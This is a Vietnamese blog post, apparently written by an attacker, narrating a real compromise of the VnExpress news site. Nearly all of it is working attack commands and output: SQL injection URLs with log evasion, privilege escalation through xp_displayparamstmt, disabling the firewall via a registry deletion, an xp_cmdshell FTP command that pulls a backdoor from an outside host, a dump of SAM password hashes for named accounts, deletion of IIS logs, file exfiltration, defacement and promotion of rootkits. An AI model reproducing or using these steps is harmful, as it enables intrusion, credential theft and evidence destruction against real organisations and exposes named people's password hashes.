Blog Lá Cải

Thỏa hiệp vnexpress

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3`
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services

Error Type:
Unclosed quotation mark before the
character string `` /User/Rao-vat/Source/Detail.Asp, line 114

Yeah!

Mình thử dùng các kí tự khác ngoài dấu `: `` , ( ) để biết được chính xác URL khai thác:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) ...

Bây giờ đến việc tiến hành xâm nhập vào máy chủ này qua lỗi SQL Injection!

- Đầu tiên mình xác định xem phiên bản của MSSQL và Windows NT:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,@@version)--sp_password

Syntax error converting the nvarchar value `Microsoft SQL Server 2000 - 8.00.655 (Intel X86)
Jul 3 2002 18:10:57 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition
on Windows NT 5.0 (Build 2195: Service Pack 3)` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

(Để tránh ghi nhật kí trong MSSQL, mình thêm sp_password vào sau --.
Khi MSSSQL phát hiện ra chuổi `sp_password` trong câu lệnh SQL, nó sẽ ghi nhật kí
như sau: -- `sp_password` was found in the text of this event. -- The text has been replaced
with this comment for security reasons.. Để cho đơn giản, từ đây mình sẽ ghi tắc --sp_password là -- nha)

+ SQL 2000 8.00.655 03/07/2002
+ Windows 2000 5.0 Build 2196 SP3

- Mình xác định tiếp tên người dùng hiện tại và tên CSDL đang làm việc:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,system_user)--

Syntax error converting the nvarchar value `IUSR_WIN10814` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,db_name())--

Syntax error converting the nvarchar value `Infostore` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

Username hiện tại không phải là sa hoặc BUILTINAdministrators
nên không thể xài master..xp_cmdshell. SQL ngày 03/07/2002, đang chạy
với Windows Authentication user là IUSR_WIN10814, hơi cũ so với ngày hiện tại.
Mình vào trang http://www.securiteam.com và
search các lỗi của MSSQL đã được công bố sau ngày 03/07/2002. Đây là thứ mà mình tìm:

NGSSoftware Insight Security Research Advisory

Name: Extended Stored Procedure Privilege Upgrade
Systems: Microsoft SQL Server 2000 and 7
Severity: High Risk
Category: Privilege Escalation
Vendor URL: http://www.microsoft.com/
Author: David Litchfield ( david@ngssoftware.com Địa chỉ email này đang được bảo vệ khỏi chương trình thư rác, bạn cần bật Javascript để xem nó )
Advisory URL: http://www.ngssoftware.com/advisories/mssql-esppu.txt
Date: 15th August 2002
Advisory number: #NISR15002002A


Description
***********
Microsoft SQL Server 2000 and 7 extends functionality by using extended
stored procedures. Three particular extended stored procedures contain a
vulnerability that allow a low privileged user to run abritrary SQL queries
in the context of the
account running SQL Server.

Details
*******
SQL Server supports two forms of authentication. The first is where a user
uses an SQL login and password to authenticate and the second is through
Windows Authentication. Any user authenticated by Windows can ``upgrade``
their privileges to that of the account running the SQL Server by using one
of three extended stored procedures. These stored procedures allow a user to
run an arbitrary SQL query. By exploiting this problem a low privileged user
will be able to run any stored procedure, extended or otherwise, and select
from, update or insert into any table in any database. That is by exploiting
these holes an attacker can fully compromise the database server and its
data. Whilst an SQL Login user can not directly exploit this vulnerability
they can do so indirectly by submitting a job to the SQL Agent. As this the
SQL Agent authenticates to the SQL Server and runs in the context of Windows
account these vulnerabilities can be exploited. Please see NGSSoftware alert
NISR15002002A (http://www.ngssoftware.com/advisories/mssql-esppu.txt) for
more details.

Fix Information
***************
NGSSoftware informed Microsoft of these issues in July. Microsoft has
produced a patch that resolves these issues. Please see

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-043.asp

for more details.

For those SQL Server database administrators who are not able to patch
immediately NGSSoftware recommend that they remove public access to these
stored procedures. This will prevent low privileged users from accessing
these extended stored procedures.

xp_execresultset
xp_printstatements
xp_displayparamstmt

A check for this vulnerability has been added to Typhon II, NGSSoftware`s
vulnerability assessment scanner, of which, more information is available
from the NGSSite, http://www.ngssoftware.com/.

Username hiện tại là IUSR_WIN10814, thuộc loại Windows Authentication nên chúng ta có thể dùng xp_displayparamstmt để nâng quyền của username này lên dbo.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_displayparamstmt
N`sp_addsrvrolemember ``IUSR_WIN10814``,``sysadmin```,N`master`,1--

Mình add user IUSR_WIN10814 vào n
hóm sysadmin để có thể dùng được master..xp_cmdshell

Xác định lại username hiện tại xem sao?

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3
) and 1=convert(int,user_name())--

Syntax error converting the nvarchar value `dbo` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

DBO - Chúng ta đang có quyền hạn cao nhất trên máy chủ MSSQL đó nha.

Tiếp theo mình xác định địa chỉ IP của máy chủ này như sau:

Đầu tiên tạo một bảng chứa dữ liệu và đổ kết quả của lệnh exec master..xp_cmdshell `ipconfig` vào bảng này.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);create
table systables(a int identity,b varchar(1000)) insert into systables exec master..xp_cmdshell `ipconfig`--

Việc còn lại là lấy kết quả từ bảng systables:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,(select top 1 b from systables where b like `%25IP Address%25`))--

(%25 == ``%``)

Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . :
10.244.63.231 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114
http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,(select b from systables where b like `%25IP Address%25`) and b not in(`%2510.244.63.231%25`))--

Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . :
198.64.129.137 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and
1=convert(int,(select b from systables where b like `%25IP Address%25`)
and b not in(`%2510.244.63.231%25`,`%25198.64.129.137%25`))--

Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . :
198.64.132.21 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,(select b from systables where b like `%25IP Address%25`)
and b not in(`%2510.244.63.231%25`,`%25198.64.132.21%25`,`%25198.64.129.137%25`,`%25198.64.132.21%25`))--

Syntax error converting the nvarchar value ` IP
Address. . . . . . . . . . . . : 198.64.132. 22` to a column of
data type int. /User/Rao-vat/Source/Detail.Asp, line 114

Hì hì, nó có đến 4 địa chỉ IP luôn!

Mình thử ping đến vnexpress.net để xem thử địa chỉ IP của Web Server ra sao?

C: > ping vnpress.net

Pinging vnexpress.net [198.64.132.22] with 32 bytes of data:

Reply from 198.64.132.22: bytes=32 time=344ms TTL=105
Control-C

Như vậy IIS và MSSQL đều được cài trên cùng một máy chủ.

Thử nối đến cổng cổng 1433 bằng Netcat xem sao?

C: > nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?): connection refused
sent 0, rcvd 0: NOTSOCK

VnExpress.NET đã đặt tường lửa cho cổng 1433 rồi.
Mình nghĩ khả năng lớn nhất là họ đã dùng tường lửa lọc
cổng dữ liệu đi kèm với Windows 2000 Server. Mình quyết định phá tường lửa này.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_regdeletevalue `HKEY_LOCAL_MACHINE`,

`SYSTEMCurrentControlSetServicesTcpipParameters`,`EnableSecurityFilters`--

Chỉ cần del giá trị EnableSecurityFilters trong khóa HKLMSYSTEMCurrentControlSetServicesTcpipParameters là xong.

Nối lại xem sao?

C: > nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?) open

Đúng y như mình đã dự đoán!

Bây giờ đến việc upload backdoor và một vài đồ nghề khác lên server.
Mình chuẩn bị sẵn mấy thứ này trong thư mục /vnexpress trên máy chủ FTP free-hosting.
Bởi vì việc lấy các file trên FTP hơi lâu nên nếu dùng IE5 thì kết sẽ bị ngắt nữa chừng
do lỗi timeout (đang xài kết nối quay số ở ngoài dịch vụ mà) nên mình chuyển sang xài
Mini-Browser (*Mini-Browser là một đồ nghề không thể thiếu được khi hack web).
Set lại proxy cho Mini-Browser là proxy.ia2.marketscore.com:80 cho chắc.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_cmdshell `echo open ftp.esmartweb.com > f & echo user username xxxxx > > f & echo bin > > f & echo cd /vnexpress > > f & echo mget * > > f & echo quit > > f & ftp -v -i -n -s:f`--

URLEncode - > http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);

exec%20master..xp_cmdshell%20`echo%20open%20ftp.esmartweb.com

%20%3Ef%20%26%20echo%20user%20username%20xxxxx%20%3E%3Ef

%20%26%20echo%20bin%20%3E%3Ef%20%26%20echo%20cd%20/vnexpress

%20%3E%3Ef%20%26%20echo%20mget%20*%20%3E%3Ef%20%26%20

echo%20quit%20%3E%3Ef%20%26%20ftp%20-v%20-i%20-n%20-s%3Af`--

[GET]

Waiting...!
Done.

Kích hoạt backdoor WinShell 4.0:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_cmdshell `backup`--

Xong, bây giờ chỉ việc kết nối đến backdoor WinShell. Mình dùng Putty để nối

+ Host Name (or IP Address): 198.64.132.22
+ Port: 3371
+ Protocol: (o) Raw

xxxxx

WinShell v4.0

(C)2001 by janker

http://www.bugsos.com

? for help
CMD > s
C:WINNTsystem32 > _

- Đổ SAM

Administrator:500:C3591A674B80231AF24E41BBADB86F3F:B0F92BB2E3471150BEC31733D67288EA:Built-in account for administering the computer/domain::
Guest:501:********************************:********************************:Built-in account for guest access to the computer/domain::
TsInternetUser:1000:DFA15ABF9536AE19F7FF965C044A5116:D21C509DA73030AD8DA1014F3A211943:TsInternetUser,This user account is used by Terminal Services.::
IUSR_WIN10814:1001:9C0887DCB5F1EA859B0B497A5C75047F:A9438645CA94E67F631C2E14E1CDF7D4:Internet Guest Account,Built-in account for anonymous access to Internet Information Services::
IWAM_WIN10814:1002:A4BE543712EDBA21B0991B757487A81E:BCE493DFA35602091F9285CAEABA3128:Launch IIS Process Account,Built-in account for Internet Information Services to start out of process applications::
Internet:1003:336F31071CA2B4A0D14C9408F0C70C13:80C82BA8E876F8D59732AC429A93072B:Internet,FPT Internet admin access::
vReplicator:1004:578BFE097611D01A73545BB507664033:AF30E872418F24EC3FD86F58CB8F0DFD:Replicate Site::
AdminEditor:1005:A07C0994B7D99B918284770D91848144:121CF5A2FB538FC2EF4918C69EC29116:Admin Editor::
Thangpv:1006:F138C587F87CB06E29B1F66481A851EE:7AA75649EA242FE1FD76191279F2F407:Pham Vinh Thang::

- Xác định WWROOT của IIS

C:WINNTsystem32 > reg query ``hklmsystemcurrentcontrolsetservicesw3svcparametersvirtual roots``
! REG.EXE VERSION 2.0

HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicesw3svcparametersvirtual roots
/ REG_SZ D:InfostoreMaster,,201
/IISHelp REG_SZ C:WINNTHelpiisHelp,,201
/Replicate REG_SZ D:InfoStoreReplicate,,201

- Xóa nhật kí của IIS (thật sự thì mình không hề bị ghi nhật kí vì Admin của VnExpress.NET đã disable log của IIS do số lượng người truy cập vào trang web này quá đông)

C:WINNTsystem32 > reg query hklmsystemcurrentcontrolsetservicesw3svcparameters /v logfiledirectory
! REG.EXE VERSION 2.0

HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicesw3svcparameters
logfiledirectory REG_SZ C:WINNTSystem32LogFiles

C:WINNTsystem32 >
C:WINNTsystem32 > dir %systemroot%system32logfiles
Volume in drive C has no label.
Volume Serial Number is 5C62-FB1E

Directory of C:WINNTsystem32logfiles

04/19/2002 12:26a

.
04/19/2002 12:26a ..
04/19/2002 07:24a W3SVC1
0 File(s) 0 bytes

C:WINNTsystem32 > rd /s /q logfilesw3svc1

- Để xem có gì trong WWROOT không?

D:InfoStore > dir
Volume in drive D is InfoStore
Volume Serial Number is 544E-1C8D

Directory of D:InfoStore

04/25/2002 08:39a .
04/25/2002 08:39a ..
04/19/2002 10:44a ftproot
09/20/2002 03:29p Master
10/01/2002 01:10p Replicate
0 File(s) 0 bytes
5 Dir(s) 46,340,067,328 bytes free

Cả khối file tin tức trong thư mục Master. Mình thấy chỉ có Replicate
và một số ít các file trong Master là còn có giá trị nên download về.

C:WINNTsystem32 > rar -a f.zip d:infostore eplicate*.*
C:WINNTsystem32 > copy /y f.zip d:infostoremaster eadme.txt

(dùng Mass Downloader để download file http://vnexpress.net/readme.txt về)

C:WINNTsystem32 > del d:infostoremaster eadme.txt

... và một số việc khác nữa không kể ra ở đây tới.

*Server của VnExpress.NET chẳng có thứ gì ngoài mấy cái tin tức cung
cấp miễn phí cho mọi người nên mình quyết định stop tại đây, không xóa bất kì file n
ào trên server đâu nha. Mình chỉ upload vài file để deface trang VnExpress.NET cho vui thôi.

- À nếu bạn cần cài backdoor/rootkit không bị phát hiện trên Windows NT thì dùng Hacker Defender (http://rootkit.host.sk)
hoặc TYT ( http://www.polarhome.com/~vickit/tyt0/ ,
mã nguồn: http://www.polarhome.com/~vicki/hack/congcu/win/tyt0-src.zip)
của mình nha. * Hiện tại bản Hacker Defender 0.7.3
không làm việc trên Windows 2000 bản Enterprise. Mình đã test thử trên vài server rồi,
trong khi backdoor của mình thì vẫn làm việc tốt đối với bản Enterprise.
Khi nào có source-code của HxDef mình sẽ phát triển tiếp con backdoor của mình để cho các bạn xài.
Nói thật là mấy thứ backdoor và rootkit này cũng rất dễ bị phát hiện và disable. Hì hì, không nói ở đây nha (để cho an toàn thôi)

được đăng bởi Toi La Ai @ 21:17